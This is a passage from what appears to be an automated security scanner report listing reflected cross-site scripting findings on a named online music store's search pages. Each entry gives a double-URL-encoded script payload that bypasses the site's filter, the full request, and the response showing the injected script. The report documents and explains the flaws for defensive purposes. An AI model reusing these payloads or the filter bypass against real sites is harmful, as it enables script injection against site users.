<head>
   <link re
...[SNIP]...
<title>PJ Harveyb0484</title><script>alert(1)</script>980e1e0e4cd</title>
...[SNIP]...

1.238. http://www.insound.com/search/query/PJ%20Harvey&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/PJ%20Harvey&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff7bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e00312ed5ba8 was submitted in the REST URL parameter 3. This input was echoed as ff7bc"><script>alert(1)</script>00312ed5ba8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/PJ%20Harveyff7bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e00312ed5ba8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=hjgdhgpuqjtu6l76m0599r4d76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=100929960; expires=Sun, 09-Jan-2011 02:37:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=547547888; expires=Sun, 09-Jan-2011 02:37:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="PJ Harveyff7bc"><script>alert(1)</script>00312ed5ba8" />
...[SNIP]...

1.239. http://www.insound.com/search/query/Perfume%20Genius&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Perfume%20Genius&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59d7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8e61b363abb was submitted in the REST URL parameter 3. This input was echoed as 59d7f"><script>alert(1)</script>8e61b363abb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Perfume%20Genius59d7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8e61b363abb&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rmqk5ad0ukkier51h5hhdo29g0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=110210423; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=570664823; expires=Sun, 09-Jan-2011 02:37:50 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Perfume Genius59d7f"><script>alert(1)</script>8e61b363abb" />
...[SNIP]...

1.240. http://www.insound.com/search/query/Perfume%20Genius&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Perfume%20Genius&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8c2d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed8e08f195e2 was submitted in the REST URL parameter 3. This input was echoed as 8c2d4</title><script>alert(1)</script>d8e08f195e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Perfume%20Genius8c2d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed8e08f195e2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=t02gfkaku815drva7eht8vpgl1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=462160548; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=74961451; expires=Sun, 09-Jan-2011 02:37:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Perfume Genius8c2d4</title><script>alert(1)</script>d8e08f195e2</title>
...[SNIP]...

1.241. http://www.insound.com/search/query/Purling%20Hiss&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Purling%20Hiss&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload fcea5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbc3f0798f6 was submitted in the REST URL parameter 3. This input was echoed as fcea5</title><script>alert(1)</script>bbc3f0798f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Purling%20Hissfcea5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbc3f0798f6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=71tmt5kog5dn4ahl5331ucmk44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=21586655; expires=Sun, 09-Jan-2011 02:40:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=7116944; expires=Sun, 09-Jan-2011 02:40:42 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Purling Hissfcea5</title><script>alert(1)</script>bbc3f0798f6</title>
...[SNIP]...

1.242. http://www.insound.com/search/query/Purling%20Hiss&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Purling%20Hiss&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7db43%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f0ec8c4343 was submitted in the REST URL parameter 3. This input was echoed as 7db43"><script>alert(1)</script>5f0ec8c4343 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Purling%20Hiss7db43%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f0ec8c4343&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=kn8buhkog2gkunbsu6840sj3n1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=465494046; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=149641399; expires=Sun, 09-Jan-2011 02:40:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Purling Hiss7db43"><script>alert(1)</script>5f0ec8c4343" />
...[SNIP]...

1.243. http://www.insound.com/search/query/Raekwon&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Raekwon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c34ef%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73286eaf417 was submitted in the REST URL parameter 3. This input was echoed as c34ef</title><script>alert(1)</script>73286eaf417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Raekwonc34ef%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73286eaf417&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=b4q9e19to5r83cnmb4pgedg9f7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=483188194; expires=Sun, 09-Jan-2011 02:38:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=449263942; expires=Sun, 09-Jan-2011 02:38:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Raekwonc34ef</title><script>alert(1)</script>73286eaf417</title>
...[SNIP]...

1.244. http://www.insound.com/search/query/Raekwon&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Raekwon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6560a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed584a60ee94 was submitted in the REST URL parameter 3. This input was echoed as 6560a"><script>alert(1)</script>d584a60ee94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Raekwon6560a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed584a60ee94&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=aok39832smftirj49l9nklua72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=108066889; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=152619735; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Raekwon6560a"><script>alert(1)</script>d584a60ee94" />
...[SNIP]...

1.245. http://www.insound.com/search/query/Residual%20Echoes&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Residual%20Echoes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaddd2ad8ed3 was submitted in the REST URL parameter 3. This input was echoed as c78d8"><script>alert(1)</script>addd2ad8ed3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Residual%20Echoesc78d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaddd2ad8ed3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1mopln8na91lau6dec3pfc8dv4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=259160912; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=425413843; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Residual Echoesc78d8"><script>alert(1)</script>addd2ad8ed3" />
...[SNIP]...

1.246. http://www.insound.com/search/query/Residual%20Echoes&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Residual%20Echoes&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b1c96%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a7f7f97f3 was submitted in the REST URL parameter 3. This input was echoed as b1c96</title><script>alert(1)</script>4a7f7f97f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Residual%20Echoesb1c96%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a7f7f97f3&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1nufmcpi5ttjnc4gpbhmg3o4f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=235712226; expires=Sun, 09-Jan-2011 02:40:32 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=189297920; expires=Sun, 09-Jan-2011 02:40:32 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Residual Echoesb1c96</title><script>alert(1)</script>4a7f7f97f3</title>
...[SNIP]...

1.247. http://www.insound.com/search/query/Rihanna&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Rihanna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload afcce%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e688e097aeb1 was submitted in the REST URL parameter 3. This input was echoed as afcce</title><script>alert(1)</script>688e097aeb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Rihannaafcce%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e688e097aeb1&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=r5gh1gqj9md5fte2ckh08madr5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=178756689; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=29160399; expires=Sun, 09-Jan-2011 02:38:07 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Rihannaafcce</title><script>alert(1)</script>688e097aeb1</title>
...[SNIP]...

1.248. http://www.insound.com/search/query/Rihanna&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Rihanna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51396%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef815a78008b was submitted in the REST URL parameter 3. This input was echoed as 51396"><script>alert(1)</script>f815a78008b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Rihanna51396%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef815a78008b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=i7oq4quv18pmck4l9057dotl76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=212609566; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=364849586; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Rihanna51396"><script>alert(1)</script>f815a78008b" />
...[SNIP]...

1.249. http://www.insound.com/search/query/Rita%20Indiana&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Rita%20Indiana&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8b4f3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e039ab75402c was submitted in the REST URL parameter 3. This input was echoed as 8b4f3</title><script>alert(1)</script>039ab75402c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Rita%20Indiana8b4f3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e039ab75402c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k3u4eec4e4ud3ddsohj1vhcn67; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=49177946; expires=Sun, 09-Jan-2011 02:37:58 GMT; path=/; domain=.insound.com
